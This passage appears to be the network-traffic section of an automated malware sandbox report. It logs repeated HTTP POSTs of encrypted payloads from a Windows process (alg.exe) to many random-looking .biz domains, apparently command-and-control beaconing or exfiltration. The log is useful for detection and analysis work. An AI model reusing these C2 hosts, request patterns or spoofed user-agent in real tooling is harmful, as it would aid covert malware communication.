31 | 192.168.2.7 | 50010 | 18.141.10.107 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:31.581667900 CET | 353 | OUT | POST /xyuwwggfo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:57:31.581667900 CET | 842 | OUT | Data Raw: ba 35 92 fc 6c 89 96 2d 3e 03 00 00 4b d3 ac fc f8 26 61 79 ef 82 ea f8 55 a6 a5 46 18 d6 27 32 96 ae d4 27 b6 1c 23 48 77 21 ac 64 97 56 3b 0a 8a da c6 8f 8d 03 62 77 07 a2 10 18 ac b2 16 34 91 5d ba e2 b4 61 b6 2a 9e 0c b3 22 b8 0a 8a 74 e1 28
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 5l->K&ayUF'2'#Hw!dV;bw4]a*"t(|xtLFJescL}YKRs>kKhW;7@M'MV0pc*08wN*kfxTsU} F<wu7]tkeqY94{rTnn'029
Nov 18, 2024 09:57:33.032638073 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=4b62e5563c9e974733579b13cb762da4|155.94.241.187|1731920252|1731920252|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.7 | 50011 | 47.129.31.212 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:31.868765116 CET | 358 | OUT | POST /kywuwrijhguqpyu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.868765116 CET778OUTData Raw: 3d 63 61 01 84 45 d3 a8 fe 02 00 00 26 dd 75 e7 b2 3a 9d 2c 91 5f e1 6c c9 58 23 e0 d7 8f 3f b5 0b 91 7d ad 02 2f 94 33 85 27 a6 bf ad 14 68 d8 20 13 f0 36 39 af 89 cb fd 00 01 3b 03 3c 85 2d b6 33 02 17 dd 13 ca e0 bd 22 84 fe ae 67 41 5a be f9
Nov 18, 2024 09:57:33.374553919 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:57:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=12504401d5a68c9798c0ec817d9bcdb7|155.94.241.187|1731920253|1731920253|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
33 | 192.168.2.7 | 50012 | 82.112.184.197 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:33.067526102 CET | 354 | OUT | POST /pjybylbfofdj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 842
Nov 18, 2024 09:57:33.067526102 CET | 842 | OUT | Data Raw: ab 5c b9 00 03 a3 3c b2 3e 03 00 00 25 e7 55 be 71 14 eb 8b 1b df 36 d4 83 b4 9a 3c ed c7 08 0c 8a 6d e6 b7 fc 0a 09 86 7c 58 fd ef e1 8f 23 ee a7 e4 3e dc f2 55 2b 05 af df c8 48 bb 06 76 e5 97 88 d5 0a c8 3b eb b6 b2 e2 27 12 72 39 ce e2 49 ab


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.7 | 50013 | 13.251.16.150 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:33.746913910 CET | 345 | OUT | POST /kha HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ifsaia.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:57:33.746958971 CET | 778 | OUT | Data Raw: a4 43 93 cf 86 4f 98 7d fe 02 00 00 d8 dc 02 08 9e 72 5a dd 83 3d 40 49 42 eb f0 58 89 88 d8 6e 81 b5 54 71 8d 6a 49 2b 0d a3 36 50 9f be c7 c4 f8 8f 89 1c 72 35 65 3c 77 25 fb bc 52 c4 cf 40 81 64 b2 40 61 ac 54 b0 46 f8 87 64 a3 4a 9e f4 54 ab
Nov 18, 2024 09:57:35.190474987 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:57:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6278f0b2a7cedbd721446296139ece85|155.94.241.187|1731920254|1731920254|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.7 | 50014 | 44.221.84.105 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:35.406069040 CET | 347 | OUT | POST /sa HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: saytjshyf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:57:35.406069040 CET | 778 | OUT | Data Raw: 90 3d ec 69 44 ec bc a2 fe 02 00 00 a0 26 0f 9d 0a 4a 0b 57 82 d1 10 b9 a0 20 f9 e6 c6 c5 4f 47 de bd d5 74 33 95 07 34 43 19 00 da 5b a9 33 c6 ae 9e aa ad 34 57 fb 66 9a b8 24 85 77 0d 10 e5 3f 25 95 98 41 51 c7 10 a7 24 18 ab 49 7a e8 af b6 b5
Nov 18, 2024 09:57:36.077414036 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:57:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2e3975f80ed4e812ccb2edd0435ddb50|155.94.241.187|1731920255|1731920255|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.7 | 50015 | 18.141.10.107 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:36.241530895 CET | 350 | OUT | POST /idasaqn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:57:36.241550922 CET | 778 | OUT | Data Raw: 9f cb 3a 05 90 97 39 21 fe 02 00 00 40 19 2d 59 14 6d cd a5 74 5e d0 f9 45 af 78 44 cc 6e 55 87 f9 45 61 54 58 0e fb 05 02 fc 33 31 75 60 1d 10 4b f2 80 67 35 6d d2 5a 3a 1b 80 e8 64 2b 62 5b 1e dd d3 a2 6a f8 0c 36 30 ef de fd 86 31 93 2e 59 22
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: :9!@-Ymt^ExDnUEaTX31u`Kg5mZ:d+b[j601.Y"\90<5O6XMi:Ay_)zW91I1"r#B;!kz,bN\(6>Pp^nHsj~T(%l~
Nov 18, 2024 09:57:37.713766098 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=8f68faa2875b6855dc959ae73779e78e|155.94.241.187|1731920257|1731920257|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.7 | 50016 | 172.234.222.138 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:37.934586048 CET | 344 | OUT | POST /hge HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:57:37.934741020 CET | 778 | OUT | Data Raw: 3b be 2e 69 c6 6f 64 27 fe 02 00 00 c0 08 5f c4 70 a6 03 7f 77 20 cd 26 ce 44 7d 36 46 55 8c ed a1 f6 6b b1 38 92 b3 31 81 00 7f f7 8d b5 c9 54 5b 0e ea d3 ba 29 f8 45 d6 c6 dc 84 25 82 02 3c 66 7c 23 e4 7a ce d1 80 7f 89 ae e8 5a 86 3a 34 4e 25
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ;.iod'_pw &D}6FUk81T[)E%<f|#zZ:4N%XoXY3MNq6mE-"wc$YNo=6~PS^],i)p&jS&5:Dv6Y>F<ovA=99m`&O?oOn,o y


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.7 | 50017 | 172.234.222.138 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:38.859786987 CET | 353 | OUT | POST /sycehlfxifni HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:57:38.859786987 CET | 778 | OUT | Data Raw: 7b fe 33 c5 2a 9c 93 39 fe 02 00 00 f0 2e 2a c6 94 95 c9 bd 12 61 e8 fa d4 cb af b5 db 49 1d 77 32 6a 1b cb 13 ac 10 65 4c 1a 20 63 cb 4d 56 3b 1c 95 69 22 0e 4d 2f 29 46 d0 71 01 27 c5 cf 10 02 ed 97 27 cb 9a 79 31 aa bb 70 68 d8 7e f8 7e 6c 9d
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: {3*9.*aIw2jeL cMV;i"M/)Fq''y1ph~~lpHw?0xL4w*+v~[RAYVQ.T0UF])K&01g|{5L<|p3VMV"}o[w%qE'7T^h l.8ROqXk!d7


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.7 | 50018 | 34.246.200.160 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:39.741772890 CET | 350 | OUT | POST /umftqsqq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:57:39.741792917 CET | 778 | OUT | Data Raw: 07 be 99 35 46 16 91 8c fe 02 00 00 4a f5 9c 93 f7 41 dd 73 12 ad 46 f2 31 37 d7 77 d1 9f 39 79 ec 94 7b fb 97 f2 60 c3 3a bf 43 c2 54 83 bb d6 2e 8b e0 87 dc 56 f5 37 7f d8 3b 77 a5 9a 46 9c f7 4d 46 ec 43 75 60 16 50 55 7b c0 40 f0 92 6c 7d 60
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 5FJAsF17w9y{`:CT.V7;wFMFCu`PU{@l}`-NUw)+]l`}1zq5wK(A6xke?)!' h\,3O`myA6hSzW)~;ja;;vP^L
Nov 18, 2024 09:57:40.697495937 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=bcbd7dd1420ae13cea07939741e38fbe|155.94.241.187|1731920260|1731920260|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.7 | 50019 | 18.208.156.248 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:40.943301916 CET | 348 | OUT | POST /jisysli HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: deoci.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:57:40.943341970 CET | 778 | OUT
Nov 18, 2024 09:57:41.605125904 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:57:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9466017915a26b373df97f502562bacd|155.94.241.187|1731920261|1731920261|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
41 | 192.168.2.7 | 50020 | 82.112.184.197 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:41.563838005 CET | 351 | OUT | POST /lxkilbbex HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 842
Nov 18, 2024 09:57:41.563853979 CET | 842 | OUT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.7 | 50021 | 208.100.26.245 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:42.509325981 CET | 354 | OUT | POST /xtwpytxmpg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:57:42.509342909 CET | 778 | OUT
Nov 18, 2024 09:57:43.149945974 CET | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 18 Nov 2024 08:57:43 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 18, 2024 09:57:43.455840111 CET | 353 | OUT | POST /vxagkgmfv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:57:43.455874920 CET | 778 | OUT | Data Raw: bc 53 1c c5 b1 64 56 0a fe 02 00 00 61 3f a9 fc 6a 79 85 5c fb 5a ca f9 70 9a ee 22 97 47 24 d4 94 a2 54 db 4a 09 11 1b b4 62 03 ee 11 b5 4c b7 a8 9c 7a 03 ed 9d 72 0d e2 b9 65 4f 4c 0a 97 4e 98 cb 63 2c a5 64 6d ad 1f 55 54 86 bd a3 7f 2e b7 33
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: SdVa?jy\Zp"G$TJbLzreOLNc,dmUT.3,$P@bVZr&cW\$}9bFg[uKO6RfOp_Okcb=hP=exh)IIK}Lp6M^/:2nkHMShAv'
Nov 18, 2024 09:57:43.600764990 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.7 | 50022 | 13.251.16.150 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:43.781769991 CET | 357 | OUT | POST /hyoldlagxghmkub HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:57:43.781784058 CET | 778 | OUT | Data Raw: 36 20 f1 c3 ad 3e 4b d2 fe 02 00 00 f0 4f 5f 86 e4 32 90 96 fb 36 67 57 fe 1c 23 c9 98 78 37 67 ee a8 10 86 6a 60 41 a7 af 89 9c 8f fc 75 45 fe a6 ac db 9a 05 87 75 bd 1f f5 a1 0d a4 dd 0f 06 94 e8 69 f2 af 9e da 40 37 d8 8f c5 b2 a0 1e fe 48 69
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 6 >KO_26gW#x7gj`AuEui@7Hi-E/U[yH~ZScG^WI^Y~p&ai<U/Mf|#KcYV,`d/{4TYAk=&${#f-P3j{q"m
Nov 18, 2024 09:57:45.228607893 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=31cb914ee96879f0acd321fec8ea2199|155.94.241.187|1731920264|1731920264|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.7 | 50023 | 44.221.84.105 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:45.471549988 CET | 355 | OUT | POST /iipwcgamik HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:57:45.471673012 CET | 778 | OUT | Data Raw: 07 d9 67 1c 8c 82 fd e3 fe 02 00 00 f1 48 37 e3 61 4e 01 c6 cb 63 7f 87 51 be 66 34 82 16 67 ca 5a 39 49 b7 e7 8f 9d 52 f0 17 60 b4 85 b3 c5 fa 96 a3 4b 99 0b 30 ad da 60 5f 8a b3 c2 c7 39 43 66 f0 66 f2 db 24 6a f2 04 81 3f 3b 25 1d 82 c0 97 8e
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: gH7aNcQf4gZ9IR`K0`_9Cff$j?;%@`}II\y>wT5~O}:TZg]Ny2y@kfdZS?I\?~<jJxYl }n(oy77q
Nov 18, 2024 09:57:46.147136927 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=76fd90e3429cfb50a8b859d359898e1e|155.94.241.187|1731920266|1731920266|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
